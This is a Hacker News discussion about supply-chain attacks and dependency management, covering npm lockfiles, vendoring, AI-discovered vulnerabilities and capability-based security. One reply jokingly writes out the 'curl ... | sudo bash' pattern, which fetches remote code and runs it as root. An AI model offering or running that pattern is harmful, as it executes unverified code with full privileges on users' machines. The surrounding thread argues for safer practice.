Settings

Theme

Maybe you shouldn't install new software for a bit

xeiaso.net

825 points by psxuaw a day ago · 468 comments

Reader

marcus_holmes a day ago

This was always a nightmare waiting to happen. The sheer mass of packages and the consequent vast attack surface for supply chain attacks was always a problem that was eventually going to blow up in everyone's face.

But it was too convenient. Anyone warning about it or trying to limit the damage was shouted down by people who had no experience of any other way of doing things. "import antigravity" is just too easy to do without.

Well, now we're reaching the "find out" part of the process I guess.

  • YZF a day ago

    I worked for one company where we were super conservative. Every external component was versioned. Nothing was updated without review and usually after it had plenty of soak time. Pretty much everything built from source code (compilers, kernel etc.). Builds [build servers/infra] can't reach the Internet at all and there's process around getting any change in. We reviewed all relevant CVEs as they came out to make a call on if they apply to us or not and how we mitigate or address them.

    Then I moved to another company where we had builds that access the Internet. We upgrade things as soon as they come out. And people think this is good practice because we're getting the latest bug fixes. CVEs are reviewed by a security team.

    Then a startup with a mix of other practices. Some very good. But we also had a big CVE debt. e.g. we had secure boots on our servers and encrypted drives. We had a pretty good grasp on securing components talking to each other etc.

    Everyone seems to think they are doing the right thing. It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues. We as an industry could really use a better set of practices. Example #1 for me is better in terms of dependency management. In general company #1 had well established security practices and we had really secure products.

    • whilenot-dev a day ago

      You forgot case #4: Worked at a startup where the frontend team thought it was a good idea to use lock files during development, but to do a "fresh" install of all dependecies during the deployment step.

      And yes, they still thought they were doing the right thing.

      • hennell a day ago

        To be fair npm makes (made?) it weirdly hard to use lock files so a lot of people did that by mistake. And when you do use lock, it reinstalls every time so a retagged package can just silently update.

        • dgoldstein0 19 hours ago

          This was true in very old npm - generating the lock file was a separate command - npm shrinkwrap. And many people didn't know they should check in the shrinkwraps. But I think the default flipped before 2020 so that it now always creates package-lock.json files (unless an npm-shrinkwrap.json is present and then it uses /updates that)

        • whilenot-dev a day ago

          FYI a retagged package would result in a different SHA512 integrity sum and fail the installation process. It won't "just silently update".

          Anyway, the point of parent and me wasn't that it was considered to be a "mistake", but people thinking they "are doing the right thing".

        • throawayonthe a day ago

          doesn't `npm ci` prevent that? it fails if something doesn't match the lockfile, and wipes node_modules before running

          this is on some ancient node 16 build i was trying to clean up ci for, so not very recent npm

          • noirscape a day ago

            npm ci does indeed prevent that. The issue isn't really with npm in specific. Rather, it's with build tools like Microsoft's Oryx, which get pushed in GitHub Actions if you're using Azure App Service. That one by default uses `npm install` on older versions (it's been changed nowadays, but Azure's generated action files have a bad habit of generating with older versions of the actions they're using), even though it's specifically meant for CI usage.

            In general, use of npm ci is usually sparsely documented - most node projects you can find just recommend using npm install during the setup, suggesting a failure in promoting it's availability (I only know of it because I got frustrated that the lockfile kept clogging up git commits whenever I added dependencies with what looked like auto-generated build-time junk).

        • pseudohadamard 2 hours ago

          Another example of this is Python and its awful externally-managed-environment handling, for which the procedure for anyone who doesn't use Python every day boils down to:

          1. Get instructions from somewhere, a web page, HOWTO, whatever, telling you to "pip install thing".

          2. "× This environment is externally managed"

          3. Spend awhile Googling how to get past this and just make the damn thing work while swearing.

          This is from observing users in practice. Google "This environment is externally managed" and you'll get nothing but hits on (a) people asking what this means and how to make it go away and (b) various unsafe methods to make it so.

        • user34283 a day ago

          I can’t comment on the behavior of ancient npm versions, but with modern npm I would not even know how to skip using a lockfile.

          As for the parent comment about not using the lockfile for the production build, that’s just incredibly incompetent.

          Maybe they should hire someone who knows what they are doing. Contrary to the popular beliefs of backend engineers online, you also need some competency to do frontend properly.

          In this case what’s needed is „npm ci“ instead of „npm install“ or better „pnpm install —frozen-lockfile“.

          Pnpm will also do that automatically if the CI environment variable is set.

          • cxr 21 hours ago

            > In this case what’s needed is „npm ci“ instead of „npm install“ or better „pnpm install —frozen-lockfile“.

            The grugbrain developer says, "I can use git-add to keep a version controlled copy of the library in my app's source tree with no extra steps after git-clone."

            (Pop quiz: what problem were the creators of NPM's lockfile format trying to solve?)

            • yearolinuxdsktp 20 hours ago

              Lock files were begrudgingly introduced after people who aren’t playing around with move fast and break things cried foul about dependencies being updated unexpectedly. The “semantic versioning” dogma and the illusion of safety that it brings was the original motivation. At NPM’s creation time, mature dep management ecosystems did not have floating versions, they were always pinned.

              When you are talking about checking your dependencies in the source tree, you are effectively pinning exact versions, and not using floating/tilde versioning syntax.

            • user34283 20 hours ago

              That breaks if the library uses build scripts, like for setting up native binaries, or native modules linked against the specific Node version.

              If you want a vendored deps model you can look at Yarn Plug and Play which does this via .zip files.

              However, I would just stick with regular pnpm and installs.

              • cxr 20 hours ago

                > That breaks if the library uses build scripts

                Uh… no.

                > setting up native binaries, or native modules linked against the specific Node version

                So the majority of projects—those that don't use binary NodeJS modules—don't have a reason for sidestepping the primary VCS and going along with npm's shoddily designed overlay version control approach?

                > However, I would just stick with regular pnpm and installs.

                You're not answering the question. npm isn't bedrock, and pnpm certainly isn't. If you're going to introduce (mandate) the use of a tool in the workflow, you should be able to justify it by explaining your rationale for introducing it (and making everyone deal with the associated costs). You should at minimum be able to provide a lucid explanation of the tradeoffs. For good measure, you should be able to disprove the "NPM Null Hypothesis"; you should be able to state a straightforward answer to the question, "What problem is this supposed to be solving?"

      • gwerbin 20 hours ago

        This is one of those bizarre "how did you even get that idea" mistakes that ironically replacing developers with AI slop farmers might actually improve on. If you ask Claude to set up a project with NPM and CI, it's not going to do weird shit like that.

        • yearolinuxdsktp 20 hours ago

          I asked Claude to set up a new NPM project and it configured the install task as “npm ci || npm install”, which is stupid. That was on Opus4.7 xhigh. When I pointed out that doing so defeats the purpose, it said “oh yeah of course.”

          Turns out there is no equivalent to “npm ci” that doesn’t clear node_modules first, and you can’t call npm install to simulate NPM ci behavior (sans clean).

    • KGunnerud a day ago

      I would rather work with a company that updates continuously, while also building security into multiple layers so that weaknesses in one layer can be mitigated by others.

      For example, at one company I worked for, they created an ACL model for applications that essentially enforced rules like: “Application X in namespace A can communicate with me.” This ACL coordinated multiple technologies working together, including Kubernetes NetworkPolicies, Linkerd manifests with mTLS, and Entra ID application permissions. As a user, it was dead simple to use and abstracted away a lot of things i do not know that well.

      The important part is not the specific implementation, but the mindset behind it.

      An upgrade can both fix existing issues and introduce new ones. However, avoiding upgrades can create just as many problems — if not more — over time.

      At the same time, I would argue that using software backed by a large community is even more important today, since bugs and vulnerabilities are more likely to receive attention, scrutiny, and timely fixes.

      • 12_throw_away 13 hours ago

        > I would rather work with a company that updates continuously, while also building security into multiple layers so that weaknesses in one layer can be mitigated by others.

        Sorry, if you are updating continuously, that there is at least one layer that you failed to build any security into.

    • bshanks 8 hours ago

      What's the conservative best practice for a solo founder (a one person company; assume the person spends ~20 hours per week on software development/maintenance and the rest of the time on other stuff)?

    • pseudohadamard 2 hours ago

      It's interesting how standards have changed. 25 years ago people screamed about ActiveX despite Microsoft's various attempts to lock it down. Today people use something that pulls a package from a Github repo that was abandoned eight years ago that pulls a package from an FTP server in Denmark that pulls a package from a Raspberry Pi in someone's basement in New Mexico and it's all good practice.

    • dataflow a day ago

      > Everyone seems to think they are doing the right thing

      I like to think people would agree more on the appropriate method if they saw the risk as large enough.

      If you could convince everyone that a nuclear bomb would get dropped on their heads (or a comparably devastating event) if a vulnerability gets in, I highly doubt a company like #2 would still believe they're doing things optimally, for example.

      • KronisLV a day ago

        > if they saw the risk as large enough.

        If you expose people to the true risks instead of allowing them to be ignorant, the conclusion that they might come to is that they shouldn’t develop software at all.

        • dataflow 7 hours ago

          The assumption was obviously that they have a compelling need to develop the software. For the sake of illustration: you imagine exposing them to whatever the highest level of risk is that still makes them wiling to develop software.

      • emodendroket a day ago

        Really? You think the alternate mode where you're running 5-year-old versions of stuff with tons of known security flaws is better?

        • coldtea a day ago

          What part of "We reviewed all relevant CVEs as they came out to make a call on if they apply to us or not and how we mitigate or address them" gave you that impression?

        • HeatrayEnjoyer a day ago

          >running 5-year-old versions of stuff with tons of known security flaws

          No one in this thread proposed that, or anything that could be reasonably assumed to have meant that.

    • ndsipa_pomu a day ago

      > It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues

      I would count myself as a "frequent upgrader" - I admin a bunch of Ubuntu machines and typically set them to auto-update each night. However, I am aware of the risks of introducing new issues, but that's offset by the risks of not upgrading when new bugs are found and patched. There's also the issue of organisations that fall far behind on versions of software which then creates an even bigger problem, though this is more common with Windows/proprietary software as you have less control over that. At least with Linux, you can generally find ways to install e.g. old versions of Java that may be required for specific tools.

      There's no simple one-size-fits-all and it depends on the organisation's pool of skills as to whether it's better to proactively upgrade or to reluctantly upgrade at a slower pace. In my experience, the bugs introduced by new versions of software are easier to fix/workaround than the various issues of old software versions.

    • JTbane 14 hours ago

      Honestly the de facto standard is to blame: at my dev job, we vacuum up all the packages we need and get the software deployed to production ASAP, then later go over the SBOM and make sure nothing looks sketchy. I'd imagine this is the default most places; an intensive approval process would slow down CI/CD too much.

    • echelon_musk a day ago

      Do you ride an R1?

      • YZF 7 hours ago

        I used to ride a 600R ... yes- that's where my handle comes from ;)

    • shevy-java 19 hours ago

      > It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues.

      Well, you critisize people who run the latest software here. Two counter-arguments:

      1) If you don't upgrade frequently, you end up with super stable debian stuck on ... ancient software. This in turn means that many more recent software, won't work, unless you recompile a lot. I had this issue with mesa for instance, then needing a more recent LLVM, spirv-components and so forth. No chance to have that easily on debian, unless you control what you compile. On my local system here I run gtk2, gtk3 and gtk4 just fine. Good luck having that with debian for recent version; even debian sid is slow compared to, say, gentoo or arch(linux) or void(linux) here.

      2) Even debian systems would be vulnerable to copy.fail. So that strategy is also not automatically better.

      Personally I am among the frequent update folks. I use ruby scripts to automatically update to the latest, in hope that the people who write code are not incompetent. There is no guarantee that newer software is automatically always better; it is a trade-off. I don't have the time and resource for infinite security audits. I need to get things done and this approach, different to the "everything is scary" crowd, works super-well for me. I use a versioned AppDir approach on linux though, so I don't run into many issues of "can not upgrade because of same .so name issue", so I can conveniently switch to other versions as-is, including the kernel. (Excluding ABI differences and glibc, but for about 98% of the programs this works very well. I am also not alone with the get-everything-working approach, see xserver or gtk2-ng: https://github.com/X11Libre/xserver https://git.devuan.org/Daemonratte/gtk2-ng - granted, for the linux kernel this does not work that well ... I think we need better strategies for the linux kernel, things such as copy.fail should not be possible. I have no good solution here, AI will find many more exploits. No clue how we can prevent this or mitigate this more easily. I was surprised when the local instructor showed us how easy it is to use python for gaining superuser access as-is.)

      • YZF 7 hours ago

        Pulling the very latest of everything is IMO risky. What I will acknowledge is that not knowing what known issues are in your stack vs. just pulling the latest all the time is less clear. But running more stable older versions of software while tracking new vulnerabilities seems like it mitigates both the risk of new changes introducing new issues and the risk of a new vulnerability not getting addressed. This worked well for company #1 where we delivered some pretty critical products and the bar was very high for reliability and security.

        A long time ago I heard that Google reviews every single line of third party code they use, not sure if it's true or if they still do it.

      • anthk 18 hours ago

        Debian had backports since forever. You could totally upgrade the kernel and MESA since month 1.

        • tremon 15 hours ago

          Not forever, backports were introduced with Sarge IIRC. And typically versions only appears in backports that are also in testing/unstable, e.g. Linux 6.19 is currently in trixie-backports but the non-LTS kernels between 6.12 and 6.18 were not available there, nor is the current 7.0 (yet).

  • tclancy a day ago

    So, to play Pandora, what if the net effect of uncovering all these unknown attack vectors is it actually empties the holsters of every national intelligence service around the world? Just an idea I have been playing with. Say it basically cleans up everything and everyone looking for exploits has to start from scratch except “scratch” is now a place where any useful piece of software has been fuzz tested, property tested and formally verified.

    Assuming we survive the gap period where every country chucks what they still have at their worst enemies, I mean. I suppose we can always hit each other with animal bones.

    • xingped a day ago

      TBH this is a pretty good way of looking at it. Yeah we're seeing an explosion of vulnerabilities being found right now, but that (hopefully) means those vulnerabilities are all being cleaned up and we're entering a more hardened era of software. Minus the software packages that are being intentionally put out as exploits, of course. Maybe some might say it's too optimistic and naive, but I think you have a good point.

      • michaelchisari a day ago

        I agree with the prediction but not the timing. We won't enter a more hardened era of software until after a long period of security vulnerabilities.

        Rivers caught on fire for a hundred years before the EPA was formed.

      • FrinkleFrankle a day ago

        New code will also use these tools from the get go, hopefully vastly reducing the vulnerabilities that make it to prod to begin with.

        • gred a day ago

          The future may be distributed quite unevenly here, as they say, with a divergence between a small amount of "responsible" code in systems which leverage AI defensively, and a larger amount of vibe-coded / prompt-engineered code in systems which don't go through the extra trouble, and in fact create additional risk by cutting corners on human review. I personally know a lot of people using AI to create software faster, but none of them have created special security harnesses a la Mozilla (https://arstechnica.com/information-technology/2026/05/mozil...).

      • akoboldfrying a day ago

        > we're entering a more hardened era of software

        This is one force that operates. Another is that, in an effort to avoid depending on such a big attack surface, people are increasingly rolling their own code (with or without AI help) where they might previously have turned to an open source library.

        I think the effect will generally be an increase in vulnerabilities, since the hand-rolled code hasn't had the same amount of time soaking in the real world as the equivalent OS library; there's no reason to assume the average author would magically create fewer bugs than the original OS library authors initially did. But the vulnerabilities will have much narrower scope: If you successfully exploit an OS library, you can hack a large fraction of all the code that uses it, while if you successfully exploit FooCorp's hand-rolled implementation, you can only hack FooCorp. This changes the economic incentive of funding vulnerabilities to exploit -- though less now than in the past, when you couldn't just point an LLM at your target and tell it "plz hack".

        • deepsun a day ago

          If I hand roll my logging library, I unlikely include automatic LDAP request based on message text (infamous Log4j vulnerability).

          • com a day ago

            I’m seeing a lot of similar things during code reviews of substantially LLM-produced codebases now. Half-baked bad idea that probably leaked from training sets.

            • dboreham 14 hours ago

              It would be very helpful to see even just one example of this syndrome posted so others could become better informed.

          • BigTTYGothGF 21 hours ago

            That particular vulnerability, sure, but there's lots of ways to make mistakes.

        • tclancy 21 hours ago

          While agreeing, it also changes the mathematics of it: if a bad actor wants to hack me specifically now they have to write custom code that targets my software after figuring out what it _is_. This swaps the asymmetry around: instead of one bad actor writing an exploit for all the world (and those exploits being even harder to find), you have to hate me specifically.

          Admittedly, not hard to do, but it could save some other folks.

          • pixl97 15 hours ago

            Depends how cheap running llms against your software becomes in the future.

        • cratermoon a day ago

          Typically when hand-rolling code you implement only what you require for your use-case, while a library will be more general purpose. As a consequence of doing more, have more code and more bugs.

          Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge doses properly.

          For supply chain security and bug count, I'll take a focused custom implementation of specific features over a library full of generalized functionality.

          • jodrellblank 19 hours ago

            leftpad was a focused custom implementation of a specific feature, instead of a library full of generalized functionality. At the time it was pulled, the leftpad code (JavaScript, Node, NPM) was:

                module.exports = leftpad;
                
                function leftpad (str, len, ch) {
                  str = String(str);
                
                  var i = -1;
                
                  ch || (ch = ' ');
                  len = len - str.length;
                
                
                  while (++i < len) {
                    str = ch + str;
                  }
                
                  return str;
                }
            
            A newer version was: https://github.com/left-pad/left-pad/blob/master/index.js which cached common cases and improved on the loop performance, before String.prototype.padStart() became a thing https://www.npmjs.com/package/string.prototype.padstart

            Both old and new versions return a string longer than `len` if the padding char is multiple characters, e.g. leftpad('a', 3, '&&&&') will be longer than 3. That feels like it shouldn't happen.

            • anthk 18 hours ago

              That's almost the first literal exercise with strings you'll learn with "The C prog lang 2nd ed" ebook. One of the most trivial cases among writting a word/space/tabs counting program (wc under Unix).

            • cratermoon 18 hours ago

              I realize I may have made it seem like I was saying leftpad was a general-purpose library. My aside about it was to note that even widely used libraries can still have bugs. That’s orthogonal to their scope.

          • akoboldfrying a day ago

            Yes, a lot hinges on how little you can get away with implementing for your use case. If you have an XML config file with 3 settings in it, you probably won't need to implement handling of external entities the way a full XML parsing library would, which will close off an entire class of attendant vulnerabilities.

            > Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge doses properly.

            This isn't really an argument in favour of having the average programmer reimplement stuff, though. For it to be, you'd have to argue that the leftpad author was unusually sloppy. That may be true in this specific case, but in general, I'm not persuaded that the average OSS author is worse than the average programmer overall. IMHO, contributing your work to an OSS ecosystem is already a mild signal of competence.

            On the wider topic of reimplementation: Recently there was an article here about how the latest Ubuntu includes a bunch of coreutils binaries that have been rewritten in Rust. It turns out that, while this presumably reduced the number of memory corruption bugs (there was still one, somehow; I didn't dig into it), it introduced a bunch of new vulnerabilities, mostly caused by creating race conditions between checking a filesystem path and using the path for something.

            • spockz a day ago

              This argument goes even further. If you have only 3 settings, why does it need to be an xml file?

              • akoboldfrying a day ago

                ETA: I'm not saying it has to, I'm saying it's possible to imagine reasons that would justify this decision in some cases.

                Because it might grow in future and you want to allow flexibility for that, because it might be the input to or output from some external system that requires XML, because your team might have standardised on always using XML config files, because introducing yet another custom plain text file format just creates unnecessary cognitive load for everyone who has to use it are real-world reasons I can think of.

                But really I was just looking for a concrete example where I know the complexity of the implementation has definitely caused vulnerabilities, whether or not the choice to use it to solve the problem at hand was sensible. I have zero love for XML.

            • cratermoon 17 hours ago

              I’m not aware of any memory corruption bugs, but some weird cases where Linux, stuck with legacy 8-bit character handling for filenames and paths, lead to unesirable behavior with Rust’s native Unicode strings.

              The race conditions were indeed TOCTOU bugs. In a sense, the bugs were a result of incorrectly handling shared mutable data, though in this case the mutations were external to Rust.

              https://corrode.dev/blog/bugs-rust-wont-catch/

        • charcircuit a day ago

          >there's no reason to assume the average author would magically create fewer bugs than the original OS library authors initially did

          Have you read this old code? It's terrible and written with no care at all to security often in C. AI is much much better at writing code.

          • akoboldfrying a day ago

            Do you have a specific library in mind? I think it would have to be an ancient, unmaintained C library.

            But I think most OSS code isn't like this -- even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel, GNU userland, PostgreSQL, Python.

            • bigiain a day ago

              > even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel

              There have been two LPE vulnerability and exploits in the Linux kernel announced today. After the one announced just last week. I don't think as much of the C code born long ago has been as carefully hardened as you think.

              (Copy Fail 2 and Dirty Frag today, and Copy Fail last week)

              • seba_dos1 a day ago

                One. "Copy Fail 2" and "Dirty Frag" are the same thing.

                • bigiain 4 hours ago

                  Are you sure? I'd really like that to be true, I felt bad finishing up work on Friday evening having applied the Dirty Frag mitigation to all our instances, but knowing (thinking?) the Copy Fail 2 vulnerability was still exploitable.

                  • seba_dos1 41 minutes ago

                    Technically there are two things that need to be fixed in the kernel indeed (and one of them was fixed already), but they're both under the "Dirty Frag" umbrella and the proposed mitigation to not allow the affected modules to load applies to them both.

                • Brian_K_White a day ago

                  And consideing the size of the kenel, I call this stupendously good.

                  You (anyone, not you personally) write that much code yourself and let's see how well you did in comparison.

                  • pixl97 15 hours ago

                    But that's the attacker advantage. You can do things right a billion times and one mistake will still take you down.

              • akoboldfrying a day ago

                Sure, I didn't mean to say that these examples are guaranteed 100% safe -- just that I trust them to be enormously more safe than software that accomplishes the same task that was hand-written by either a human or an an LLM last week.

      • anankaie a day ago

        To be fair, to some extent that’s up to us. Time to get cleaning, I guess.

      • larodi a day ago

        You are avoiding intentionally to say ‘thanks to LLMs’ or is implicit? As all these recent mega bugs surface with lots of fuzzing and agentic bashing, right ?

        • jangxx a day ago

          Thank you for reminding us all that you AI bros are still the most obnoxious people there are.

          • larodi 17 hours ago

            Indeed, yet another proof, there's the part of HN crowd which is passive aggressive, dismissive, and dishonest in the very scientific possible sense. Won't make my day harder than it is, but is a very weak signal.

            If I'm to be offended by a single thing in your post that is calling me (names) - is AI Bro. This was undeserved, and cannot be farther from the truth. Not to miss the fact your comment is entirely off topic, and perhaps you see AI bros everywhere now.

            • 12_throw_away 13 hours ago

              This seems like a very emotional response, which is off-topic for HN. Consider using facts and logic to make calm, rational arguments.

    • jpollock a day ago

      Faults are injected into the code at a constant rate per developer. Then there's the intentional injections.

      Auto-installing random software is the problem. It was a problem when our parents did it, why would it be a good idea for developers to do it?

      • rounce a day ago

        This is related to a massive annoyance of mine: when I run a piece of software and the system is missing a required dependency, I want the software to *tell me* that dependency is missing so I can make a decision about proceeding or not. Instead it seems that far too often software authors will try and be “clever” by silently installing a bunch of dependencies, either in some directory path specific to the software, or even worse globally.

        I run a distro that often causes software like this to break because their silent automatic installation typically makes assumptions about Linux systems which don’t apply to mine. However I fear for the many users of most typical distros (and other OS’ in general as it’s not just a Linux-only issue) who are subject to having all sorts of stuff foisted onto their system with little to no opportunity to easily decide what is being heaped upon them.

        • skydhash a day ago

          Ruby gems and CPAN have build scripts that rebuild stuff on the user's device (and warn you if they can't find a dependency). But I believe one of the Python's tools that started the trend of downloading binaries instead of building them. Or was it NPM?

          • Izkata 10 hours ago

            Python's pip predates npm, installs dependencies automatically, can include binaries, and the old-style packages could run arbitrary code during the install.

            Ruby gems are older than that, but I have no idea what capabilities it has/had.

      • i_think_so 15 hours ago

        Is it really a constant rate? Or is it a Law of Large Numbers kind of thing, where past a certain scale the randomness gets smoothed out and looks constant? Or something else?

        (Obviously some developers are better or worse than others, so I presume your observation is assuming developer skill as a constant.)

        • jpollock 2 hours ago

          Well, I think there are two things at play here.

          1) As org size grows, it's the team's average quality that matters (so yes, large numbers).

          2) Even with a single team, the velocity will increase to match the acceptable level of quality.

          Management will push the accelerator until they get too many bugs, then it will be "we need fewer outages".

          So, in an team+environment, you end up with a constant (in time) detection rate, which basically means a constant in time injection rate.

          If the teams' velocity increases without increasing quality, the bug injection rate (and detection rate) will increase.

          AKA if the AI is slightly worse, but 10x faster, stop carrying the pager. :)

      • teiferer a day ago

        curl ... | sudo bash

        yolo!

    • allthetime a day ago

      New software is being generated faster than it can be adequately tested. We are in the same place we’ve always been; except everything is moving much too fast.

      • repelsteeltje a day ago

        This is exactly the feeling I have. First: excessive growth of dependencies fueled by free components.

        * with internet access to FOSS via sourceforge and github we got an abundance of building blocks

        * with central repositories like CPAN, npm, pip, cargo and docker those building blocks became trivially easy to use

        Then LLMs and agents added velocity to building apps and producing yet more components, feeding back into the dependency chain. Worse: new code with unattributed reuse of questionable patterns found in unknowable versions of existing libraries. That is, implicit dependencies on fragments multitude of packages.

        This may all end well ultimately, but we're definitely in for a bumpy ride.

      • ClikeX 13 hours ago

        I'm somehow reminded of Wile E Coyoto running off a ledge, staying afloat until he realizes there is no more ground under his feet.

    • bulbar a day ago

      I think it will be an arms race in the future as well. Easier to fix known vulnerabilities automatically, but also easier to find new ones and the occasionally AI fuckup instead of the occasionally human fuckup.

      • bigiain a day ago

        Yeah.

        Right now it kinda feels to me like "Open Source" is the Russian army, assuming their sheer numbers and their huge quantity of equipment much off which is decades old.

        Meanwhile attackers and bug hunters are like the Ukrainians, using new, inexpensive, and surprisingly powerful tools that none of the Open Source community has ever seen in the past, and for which it has very little defence capability.

        The attackers with cheap drones or LLMs are completely overwhelming the old school who perhaps didn't notice how quickly the world has changed around them, or did notice but cannot do anything about quickly enough.

        • Brian_K_White a day ago

          Well this argument was certainly inventive. What a weird impression to have about these things.

          Who exactly is the innocent little Ukraine supposed to be that the big bad open source is supposed to be attacking to, what? take their land and make the OSS leader look powerful and successful at acheiving goals to distract from their fundamental awfulness? And who are the North Korean canon fodder purchased by OSS while we're at it?

          Yeah it's just like that, practically the same situation. The authors of gnu cp and ls can't wait to get, idk, something apparently, out of the war they started when they attacked, idk, someone apparently.

          • bigiain 4 hours ago

            I guess I should have realised that comment could be so easily interpreted in ways I hadn't intended - given the political nature of that war.

            I wasn't intending to pass judgement on which side is the "innocent little" and which is the "big bad", but I (and the downvoters) clearly see the it obviously reads one specific way.

            I wish I'd chosen a less contentious example of a unarguably good army that's 50 or 100 years old and is still using tactics and equipment from the 70s and earlier, fighting against a somewhat less clearly "good" army using new tools that barely existed 5 years ago and new tactics that the older army (and everybody else) has never seem before with the capability to create new weapons and adjust tactics at speeds previously thought impossible. But that war doesn't exist (at least not outside of blindly loyal Russia supporters).

            For the record, I believe Russia is clearly on the side of evil and Ukraine is clearly on the side of good in this conflict.

            • bulbar 24 minutes ago

              The problem with the metaphor is that you switched the attacker and defender role.

              Russia is the aggressor, but in your metaphor they are the defenders.

    • marcus_holmes a day ago

      This assumes that there are no new exploits being generated.

      We're seeing maintainers retreat from maintaining because the amount of AI slop being pushed at them is too much. How many are just going to hand over the maintenance burden to someone else, and how many of those new maintainers are going to be evil?

      The essential problem is that our entire system of developing civilisation-critical software depends on the goodwill of a limited set of people to work for free and publish their work for everyone else to use. This was never sustainable, or even sensible, but because it was easy we based everything on it.

      We need to solve the underlying problem: how to sustainably develop and maintain the software we need.

      A large part of this is going to have to be: companies that use software to generate profits paying part of those profits towards the development and maintenance of that software. It just can't work any other way. How we do this is an open question that I have no answers for.

      • teiferer a day ago

        That is already how it works. The loner hacker in moms basement working for free on his super critical OSS package is largely a myth. The vast majority of OSS code is contributed by companies paying their employees to work on it.

        • marcus_holmes a day ago

          I'm thinking of projects like curl [0]

          this is a cornerstone of modern software development. If it died, or if got taken over by a malicious entity, every single company on the planet would have an immediate security problem. Yet the experience of that maintainer is bad verging on terrible [1].

          We need to do better than this.

          [0] https://curl.se/docs/governance.html

          [1] https://lwn.net/Articles/1034966/

          • duskdozer a day ago

            >As an example, he put up a slide listing the 47 car brands that use curl in their products; he followed it with a slide listing the brands that contribute to curl. The second slide, needless to say, was empty.

            >He emphasized that he has released curl under a free license, so there is no legal problem with what these companies are doing. But, he suggested, these companies might want to think a bit more about the future of the software they depend on.

            There is little reason for minimal-restriction licenses to exist other than to allow corporate use without compensation or contribution. I would think by now that any hope that they would voluntarily be any less exploitative than they can would have been dashed.

            If you aren't getting paid or working purely for your own benefit, use a protective license. Though, if thinly veiled license violation via LLM is allowed to stand, this won't be enough.

            • marcus_holmes a day ago

              There is a lot of opposition in the FOSS community for restrictive/protective licenses. And to be fair, this comes from a consistent and entirely logical worldview.

              There's a bunch of problems with getting companies to pay for this, too - that sense of entitlement (or even contractual obligation), the ability to control the project with cash, etc.

              I don't have any answers or solutions. But I don't think we can hand-wave the problem away.

              • uecker a day ago

                The problem is that they get away too easily with bugs in their products they ship to customers. If this would come with some penalties, there would be some incentive to invest in security and this would probably often flow back to upstream projects.

                • marcus_holmes 21 hours ago

                  Seriously? You think that curl gets away with bugs shipping to prod? And that's the major problem?

                  I don't agree with any of that.

                  • uecker 17 hours ago

                    I was not talking about curl, but the downstream products such as cars. And I am sure curl would appreciate support from car vendors, this was the point wasn't it?

                • teytra a day ago

                  Like a money-back guarantee?

                  Like you get when you buy e.g. MS products?

                  /s

                  • uecker a day ago

                    I am not talking about the open-source projects, but the downstream products such as cars that integrate curl.

        • larodi a day ago

          The sad truth about open source in 2026 is that it does not serve the society the way it is advertised or did back in the 90s.

          • spockz a day ago

            How so? We have open source operating systems running on a whole sleuth of systems ages apart. Interesting ideas and open collaboration coming out of the OS world.

            This opposed to closed off “products” that change at the whims of the company owning it.

            • larodi a day ago

              Statistically. Most of it is created to serve marketing, personal or other agenda needs and is sponsored through the corresponding means for it.

              There’s a lot of misconception about how the open source comes to be and very small part, still significant of course, of it was really created for the benefit of a community. There are exceptions, but dig the organisational culture and origins and you’ll see the pattern. Also, thousands of projects are made for the satisfaction of the author himself being highly intelligent and high on algorithmic dopamine.

      • mastermage a day ago

        There is an xkcd about that i think

    • mahart a day ago

      Having casually read into a few recent incidents the vector has often been outside of software. A lot of mis-configurations or simply attacking the human in the chain. And nation states have basically unbounded resources for everything from bribes, insiders, and even standing up entire companies.

    • dml2135 15 hours ago

      Here's a crazy idea -- what if some of these vulnerabilities are surfacing because they have actually been found, already, and exist in the training data?

      Even an intelligence agency doesn't have perfect opsec, and something could get mentioned offhand somewhere on a forum, but never get picked up until the LLM uses it.

    • Barbing a day ago

      Will need those animal bones if all the industrial control systems get turned against us

      Nuclear might be airgapped but what about water, power…?

    • teiferer a day ago

      What we are seeing so far come out of the AI agent era is reduced not increased code quality. The few advances are by far negated by all the slop that's thrown around and that's unlikely to change.

      > any useful piece of software has been fuzz tested, property tested and formally verified.

      That would require effort. Human effort and extra token cost. Not going to happen, people want to rather move fast an break things.

      • Hfuffzehn a day ago

        Isn't blaming AI for that similar to blaming C for buffer overflows?

        More people are producing more code because of easier tools. Most code is bad. But that's not the tools fault.

        And in the end it is a problem of processes and culture.

        • teiferer a day ago

          We are not in disagreement here. I'm not blaming AI, I'm blaming the culture around its use.

      • tclancy 16 hours ago

        >What we are seeing so far come out of the AI agent era is reduced not increased code quality.

        I am not disagreeing in the main, but I wonder about the net effect. Again, this is total speculation on my part. If I vibe-slop a half dozen apps this week (and I might, just you watch), the overall raw code quality in the universe got worse. But if in the space of the same time, two major security holes got patched (assume there was no net amount of code changed), didn't things actually get better?

  • josephg a day ago

    I've been wanting a capability based security model for years. Argued about it here in fact. Capabilities are kind of an object pointer with associated permissions - like a unix file descriptor.

    We should have:

    - OS level capabilities. Launched programs get passed a capability token from the shell (or wherever you launched the program from). All syscalls take a capability as the first argument. So, "open path /foo" becomes open(cap, "/foo"). The capability could correspond to a fake filesystem, real branch of your filesystem, network filesystem or really anything. The program doesn't get to know what kind of sandbox it lives inside.

    - Library / language capabilities. When I pull in some 3rd party library - like an npm module - that library should also be passed a capability too, either at import time or per callsite. It shouldn't have read/write access to all other bytes in my program's address space. It shouldn't have access to do anything on my computer as if it were me! The question is: "What is the blast radius of this code?" If the library you're using is malicious or vulnerable, we need to have sane defaults for how much damage can be caused. Calling lib::add(1, 2) shouldn't be able to result in a persistent compromise of my entire computer.

    SeL4 has fast, efficient OS level capabilities. Its had them for years. They work great. They're fast - faster than linux in many cases. And tremendously useful. They allow for transparent sandboxing, userland drivers, IPC, security improvements, and more. You can even run linux as a process in sel4. I want an OS that has all the features of my linux desktop, but works like SeL4.

    Unfortunately, I don't think any programming language has the kind of language level capabilities I want. Rust is really close. We need a way to restrict a 3rd party crate from calling any unsafe code (including from untrusted dependencies). We need to fix the long standing soundness bugs in rust. And we need a capability based standard library. No more global open() / listen() / etc. Only openat(), and equivalents for all other parts of the OS.

    If LLMs keep getting better, I'm going to get an LLM to build all this stuff in a few years if nobody else does it first. Security on modern desktop operating systems is a joke.

